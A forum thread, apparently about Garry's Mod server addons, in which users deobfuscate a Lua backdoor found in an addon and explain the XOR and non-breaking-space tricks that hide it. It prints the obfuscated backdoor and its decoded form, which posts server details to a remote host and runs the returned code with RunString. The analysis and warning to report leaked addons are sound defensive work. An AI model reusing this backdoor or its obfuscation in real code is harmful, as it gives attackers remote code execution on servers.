Another backdoor.. When will these end...
local = _G local = ['\115\116\114\105\110\103'] local = ['\98\105\116']['\98\120\111\114'] local function () if ['\108\101\110']() == 0 then return end local = '' for _ in ['\103\109\97\116\99\104'](,'\46\46') do =..['\99\104\97\114']((["\116\111\110\117\109\98\101\114"](_,16),53)) end return end ['415c585047']['665c58455950'](5,function ()['5d414145']['655a4641']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',{['56']=['52585a51']['72504172545850585a5150']()['7b545850'],['50']=['52545850']['7250417c6574515147504646'](),['51']=['7250417d5a46417b545850']()})end )['415c585047']['665c58455950'](5,function ()['5d414145']['735041565d']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (return)['67405b6641475c5b52'](return)end ,nil )end )
so I have no idea what kind of language this is in but its not base64 for sure.. If you find something, please tell me. either on here, or at my discord: Floppydisk#5039
...so you're just gonna post it but not tell us what it is? (Even so, you should be reporting the addon instead of posting about it)
Was bored.
local _G = _G
local string = _G[string] -- ['\115\116\114\105\110\103']
local bit_bxor = _G[bit][bxor] -- _G['\98\105\116']['\98\120\111\114']
local function GetFunctionString(param)
if string.len(param) == 0 then -- if string['\108\101\110'](param) == 0 then
return param
end
local str = ''
for _ in string.gmatch(param, '..') do -- for _ in string['\103\109\97\116\99\104'](param,'\46\46') do
str = str .. string.char(bit_bxor(tonumber(_,16), 53)) -- str=str..string['\99\104\97\114'](bit_bxor(_G["\116\111\110\117\109\98\101\114"](_,16),53))
end
return str
end
timer.Simple(5, function() -- _G[GetFunctionString('415c585047')][GetFunctionString('665c58455950')](5,function ()
http.Post("<REDACTED_URL>/tracker.php", function(param) -- huge mess that's too long to put here
RunString(param) --_G[GetFunctionString('67405b6641475c5b52')](param)
end , nil )
end )
I.e., it pings the malicious webhost and grabs a payload that runs on your server.
What did you use to decode it?
probably dont want to reveal that he cracked addons
Notepad++.
They are using non-breaking spaces to try to hide the assigned variables.
The escaped strings are fairly straight forward (in server, lua_run print('\xzy etc etc'))
The first function takes the input string 2 ASCII characters at a time, converts them to hexidecimal, XORs them with 53 (110101), and then converts them back into an ASCII character.
All of that work is just to try to hide the http.Post and RunString calls to avoid being detected.
I am confused. Not trying to push you or anything but I really don't understand the process of how to do it.
This first step is knowing Lua, so you can format the obfuscated code in a more human-readable way.
I started by just adding a new line between every place I knew one should go, like after a local variable assignment.
-- Original
local = _G local = ['\115\116\114\105\110\103'] local = ['\98\105\116']['\98\120\111\114'] ..........
-- Modified - just add new lines where they should go
local = _G
local = ['\115\116\114\105\110\103']
local = ['\98\105\116']['\98\120\111\114']
local function ()
if ['\108\101\110']() == 0 then
return
end
local = ''
for _ in ['\103\109\97\116\99\104'](,'\46\46') do
=..['\99\104\97\114']((["\116\111\110\117\109\98\101\114"](_,16),53))
end
return
end
['415c585047']['665c58455950'](5,function ()
['5d414145']['655a4641']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
{
['56']=['52585a51']['72504172545850585a5150']()['7b545850'],['50']=['52545850']['7250417c6574515147504646'](),
['51']=['7250417d5a46417b545850']()
})
end )
['415c585047']['665c58455950'](5,function ()
['5d414145']['735041565d']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (return)
['67405b6641475c5b52'](return)
end ,nil )
end )
Then I just started replacing all of the escaped strings (e.g. ['\115\116\114\105\110\103']) with their actual string representations by just printing it in console.
lua_run print('\115\116\114\105\110\103') ---> string
local = _G
local = ['string']
local = ['bit']['bor']
local function ()
if ['len']() == 0 then
return
end
local = ''
for _ in ['gmatch'](,'..') do
=..['char']((["tonumber"](_,16),53))
end
return
end
['415c585047']['665c58455950'](5,function ()
['5d414145']['655a4641']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
{
['56']=['52585a51']['72504172545850585a5150']()['7b545850'],['50']=['52545850']['7250417c6574515147504646'](),
['51']=['7250417d5a46417b545850']()
})
end )
['415c585047']['665c58455950'](5,function ()
['5d414145']['735041565d']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (return)
['67405b6641475c5b52'](return)
end ,nil )
end )
Then I found the non-breaking spaces and just copy pasted a single one of them and replaced every instance of them with something stupid like 'A'.
local A = _G
local AA = A['string']
local AAA = ['Abit']['bor']
local function AAAAAAA(AAAA)
if AA['len'](AAAA) == 0 then
return AAAA
end
local AAAAA = ''
for _ in AA['gmatch'](AAAA,'..') do
AAAAA=AAAAA..AA['char'](AAA(A["tonumber"](_,16),53))
end
return AAAAA
end
A[AAAAAAA'415c585047'][AAAAAAA'665c58455950'](5,function ()
A[AAAAAAA'5d414145'][AAAAAAA'655a4641'](AAAAAAA'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
{
[AAAAAAA'56']=A[AAAAAAA'52585a51'][AAAAAAA'72504172545850585a5150']()[AAAAAAA'7b545850'],[AAAAAAA'50']=A[AAAAAAA'52545850'][AAAAAAA'7250417c6574515147504646'](),
[AAAAAAA'51']=A[AAAAA'7250417d5a46417b545850']()
})
end )A
[AAAAAAA'415c585047'][AAAAAAA'665c58455950'](5,function ()
A[AAAAAAA'5d414145'][AAAAAAA'735041565d'](AAAAAAA'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (AAreturn)
A[AAAAAAA'67405b6641475c5b52'](AAreturn)
end ,nil )
end )
From there, knowing Lua again helps because it's pretty easy to rename these variables to their true identity.
Something like AAAAAAA'415c585047' is a function call, where AAAAAAA is the function and '415c585047' is the parameter. It really looks like this: AAAAAAA('415c585047')
That function transforms the inputted string into an actual function name, which is indexed into _G to grab the corresponding function.
Im confused.. again.. im typing this in my server console
lua_run function AAAAAAA('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054') print(a) end
> function AAAAAAA('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054') print(a) end...
[ERROR] lua_run:1: <name> or '...' expected near ''5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054''
1. unknown - lua_run:0
Yeah, I can see where you are confused.
AAAAAAA('5d414....etc etc') is a function CALL. The function itself (AAAAAAA) is already defined in the middle of the code I pasted.
Look at my first post and look at the GetFunctionString function. That is my name for AAAAAAA, because it takes a seemingly random looking set of characters and transforms it into stuff like 'http', 'game', 'gmod', etc.
lua_run function GetFunctionString(5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054) print(AAA) end
> function GetFunctionString(5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054) print(AAA) end...
[ERROR] lua_run:1: malformed number near '5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054'
1. unknown - lua_run:0
It's pretty clear you don't have the basics down, and I can't really spoonfeed you too much longer.
Either put the GetFunctionString code that I posted above into a file on your server, or add it through your console with the following:
lua_run function GetFunctionString(param) if string.len(param) == 0 then return param end local str = '' for _ in string.gmatch(param, '..') do str = str .. str
ing.char(bit.bxor(tonumber(_,16), 53)) end return str end
Then you can do stuff like this in console:
lua_run print(GetFunctionString('415c585047'))
> print(GetFunctionString('415c585047'))
timer
That's all I did to find out what functions he was calling in the obfuscated code. My original post already shows all of the deobfuscated functions
if an addon has code from gastheje.ws/chamber/gas.lua or is running code from that site, you can count on it being up to no good, you should report it. email rubat or willox about the addon.
I'm pretty sure this isn't a workshop addon, the guy admitted to using gmodstore leaks in GLua discord earlier.
never trust leaked addons
How did they encrypt it?
Please, don't enter to that field
Sorry, you need to Log In to post a reply to this thread.
